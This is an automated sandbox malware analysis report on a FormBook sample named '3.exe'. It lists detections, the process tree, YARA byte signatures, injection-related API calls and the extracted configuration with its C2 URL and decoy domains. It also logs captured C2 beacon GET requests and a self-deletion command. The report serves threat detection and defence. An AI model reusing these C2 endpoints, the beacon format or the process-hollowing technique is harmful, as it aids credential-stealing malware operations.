Analysis Report 3.exe

Overview

General Information

Sample Name: 3.exe
Analysis ID: 433178
MD5: 21f077fa0e739f6174e2452abc30bb7c
SHA1: 9d60988db53eb662eb6a8e2f824036348f5e7ec0
SHA256: 6f536ae781fd98358126408aa6991b4bb3ec3f9940929a22b25f785b71ec770d
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 3.exe (PID: 5636 cmdline: 'C:\Users\user\Desktop\3.exe' MD5: 21F077FA0E739F6174E2452ABC30BB7C)
    • 3.exe (PID: 4364 cmdline: C:\Users\user\Desktop\3.exe MD5: 21F077FA0E739F6174E2452ABC30BB7C)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 2172 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 4880 cmdline: /c del 'C:\Users\user\Desktop\3.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4628 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4912 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.glocp9.com/ogpo/"], "decoy": ["ctluxurypropinternational.com", "mortgagenewsdailt.com", "diegofragnaud.info", "marthapollackesq.com", "thirtynightstay.com", "sschospitalbardoli.com", "plaquitasparamascota.com", "keochatluong.com", "420rankings.com", "westwoodstorageco.com", "valdobbiadeneinlove.com", "the427group.com", "cartercavanaugh.com", "ivvitaminsofarizona.com", "ummemunira.com", "amplifierconsulting.net", "spk-sakuranomiya.com", "anjanaonline.com", "kalibriya.com", "baincot.com", "mcintire2020.com", "janbosun.com", "briankingfineart.com", "erictailey.com", "shwanfan.com", "secretpal.club", "heatingandairtulsa.com", "hungthinhrealfintechhub.net", "dawnlodge.com", "indyoutlaws.com", "capitalpipework.com", "ngancali.com", "beconnectedby.com", "lindsaysgill.com", "mykidscast.com", "nosequemierda.com", "lightinemporium.com", "18tshortstore.com", "blakedroberts.com", "atlaschatbot.com", "healthchu.com", "aersous.info", "hanoinews.site", "studiodates.com", "gzgzdcd.com", "beeta-company.com", "mu-rain.com", "apalstyle.com", "lezbyfriends.com", "beerundead.com", "superb-mushroomcoffee.fyi", "pennydamspickups.com", "haircutbytin.com", "fulmarsolutions.com", "guoteng66.com", "plastictohydrogen.com", "dingarage.com", "elyernoson03ak2.xyz", "hayatatateyama.com", "templatejar.com", "catherinelazure.com", "ayco.sucks", "vigipharx.com", "devastateclo.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
1.0.3.exe.400000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.0.3.exe.400000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.0.3.exe.400000.1.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
1.2.3.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.3.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.glocp9.com/ogpo/"], "decoy": ["ctluxurypropinternational.com", "mortgagenewsdailt.com", "diegofragnaud.info", "marthapollackesq.com", "thirtynightstay.com", "sschospitalbardoli.com", "plaquitasparamascota.com", "keochatluong.com", "420rankings.com", "westwoodstorageco.com", "valdobbiadeneinlove.com", "the427group.com", "cartercavanaugh.com", "ivvitaminsofarizona.com", "ummemunira.com", "amplifierconsulting.net", "spk-sakuranomiya.com", "anjanaonline.com", "kalibriya.com", "baincot.com", "mcintire2020.com", "janbosun.com", "briankingfineart.com", "erictailey.com", "shwanfan.com", "secretpal.club", "heatingandairtulsa.com", "hungthinhrealfintechhub.net", "dawnlodge.com", "indyoutlaws.com", "capitalpipework.com", "ngancali.com", "beconnectedby.com", "lindsaysgill.com", "mykidscast.com", "nosequemierda.com", "lightinemporium.com", "18tshortstore.com", "blakedroberts.com", "atlaschatbot.com", "healthchu.com", "aersous.info", "hanoinews.site", "studiodates.com", "gzgzdcd.com", "beeta-company.com", "mu-rain.com", "apalstyle.com", "lezbyfriends.com", "beerundead.com", "superb-mushroomcoffee.fyi", "pennydamspickups.com", "haircutbytin.com", "fulmarsolutions.com", "guoteng66.com", "plastictohydrogen.com", "dingarage.com", "elyernoson03ak2.xyz", "hayatatateyama.com", "templatejar.com", "catherinelazure.com", "ayco.sucks", "vigipharx.com", "devastateclo.com"]}

Multi AV Scanner detection for submitted file
Source: 3.exe | Virustotal: Detection: 58%
Source: 3.exe | Metadefender: Detection: 42%
Source: 3.exe | ReversingLabs: Detection: 75%

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPE
Source: 1.2.3.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: Binary string | ipconfig.pdb source: 3.exe, 00000001.00000002.303221252.0000000000930000.00000040.00000001.sdmp
Source: Binary string | ipconfig.pdbGCTL source: 3.exe, 00000001.00000002.303221252.0000000000930000.00000040.00000001.sdmp
Source: Binary string | MusNotifyIcon.pdb source: explorer.exe, 00000005.00000000.276361272.000000000F707000.00000004.00000001.sdmp
Source: Binary string | wntdll.pdbUGP source: 3.exe, 00000001.00000003.242702997.0000000000750000.00000004.00000001.sdmp, ipconfig.exe, 00000013.00000002.468141767.0000000002C9F000.00000040.00000001.sdmp
Source: Binary string | wntdll.pdb source: 3.exe, ipconfig.exe
Source: Binary string | MusNotifyIcon.pdbGCTL source: explorer.exe, 00000005.00000000.276361272.000000000F707000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.glocp9.com/ogpo/
Source: global traffic | HTTP traffic detected: GET /ogpo/?A48d=Eb/5YKKvhsVSjoe7WKqK8lvHUaW+cW6NCkYNvfPB2x3dLSCrEs0nDFeyqabSLZo4f9MA&6lR=6lV0 HTTP/1.1 | Host: www.cartercavanaugh.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ogpo/?A48d=zC0kwP5bKctHlfLOB2+sibzcGKB3iMHeqEe/jIuGwpXwhXE0RzFo/zlZKctRC22ZSehm&6lR=6lV0 HTTP/1.1 | Host: www.ayco.sucks | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ogpo/?A48d=/XqmpevXxgIJIxa5hFR8qIX06AkulEmPv+VC/TbkNW7S9I21kt2cK+1HkO47P92lOvxw&6lR=6lV0 HTTP/1.1 | Host: www.vigipharx.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ogpo/?A48d=CbUJuKt7Vosrs6ZfvMy9ZACJtxh5Vn+1+a7oDBWZt+TgGm/ZX/AruvxTHNafm6iWRnNw&6lR=6lV0 HTTP/1.1 | Host: www.plastictohydrogen.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ogpo/?A48d=Jl6F8JfRXKQuEgspHKEQWFx9lJkkJ81RWL0viny1sd20tPIEiWVj+so6v/m+sN8GJ3v/&6lR=6lV0 HTTP/1.1 | Host: www.amplifierconsulting.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ogpo/?A48d=+lkBStlSiE9+OFshkPx+Yq+/zzAm/Md4bR1wj/5ry8M79budoFYJrIGh8Lqk2S+anP0V&6lR=6lV0 HTTP/1.1 | Host: www.plaquitasparamascota.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 54.147.194.143 54.147.194.143
Source: Joe Sandbox View | IP Address: 81.17.18.198 81.17.18.198
Source: Joe Sandbox View | ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View | ASN Name: PLI-ASCH PLI-ASCH
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS traffic detected: queries for: cdn.discordapp.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 11 Jun 2021 10:23:46 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | X-Powered-By: PHP/7.3.27 | Expires: Thu, 19 Nov 1981 08:52:00 GMT | Cache-Control: no-store, no-cache, must-revalidate | Pragma: no-cache | Set-Cookie: PHPSESSID=ab594f30faefbfad908548750f3c4e85; path=/ | Vary: Host | Data Raw: 36 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 6b<!DOCTYPE html><html><head><title>404 Not Found</title></head><body>404 Not Found</body></html>0
Source: explorer.exe, 00000005.00000003.293007696.000000000F6C3000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49716 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Windows\SysWOW64\ipconfig.exe | Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_004181B0 NtCreateFile,1_2_004181B0
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00418260 NtReadFile,1_2_00418260
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_004182E0 NtClose,1_2_004182E0
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00418390 NtAllocateVirtualMemory,1_2_00418390
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_004182DA NtClose,1_2_004182DA
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_0041838A NtAllocateVirtualMemory,1_2_0041838A
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00AE98F0
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00AE9860
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9840 NtDelayExecution,LdrInitializeThunk,1_2_00AE9840
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE99A0 NtCreateSection,LdrInitializeThunk,1_2_00AE99A0
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00AE9910
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9A20 NtResumeThread,LdrInitializeThunk,1_2_00AE9A20
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00AE9A00
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9A50 NtCreateFile,LdrInitializeThunk,1_2_00AE9A50
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE95D0 NtClose,LdrInitializeThunk,1_2_00AE95D0
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9540 NtReadFile,LdrInitializeThunk,1_2_00AE9540
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00AE96E0
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00AE9660
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00AE97A0
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9780 NtMapViewOfSection,LdrInitializeThunk,1_2_00AE9780
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9FE0 NtCreateMutant,LdrInitializeThunk,1_2_00AE9FE0
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9710 NtQueryInformationToken,LdrInitializeThunk,1_2_00AE9710
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE98A0 NtWriteVirtualMemory,1_2_00AE98A0
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9820 NtEnumerateKey,1_2_00AE9820
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AEB040 NtSuspendThread,1_2_00AEB040
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE99D0 NtCreateProcessEx,1_2_00AE99D0
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9950 NtQueueApcThread,1_2_00AE9950
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9A80 NtOpenDirectoryObject,1_2_00AE9A80
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9A10 NtQuerySection,1_2_00AE9A10
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AEA3B0 NtGetContextThread,1_2_00AEA3B0
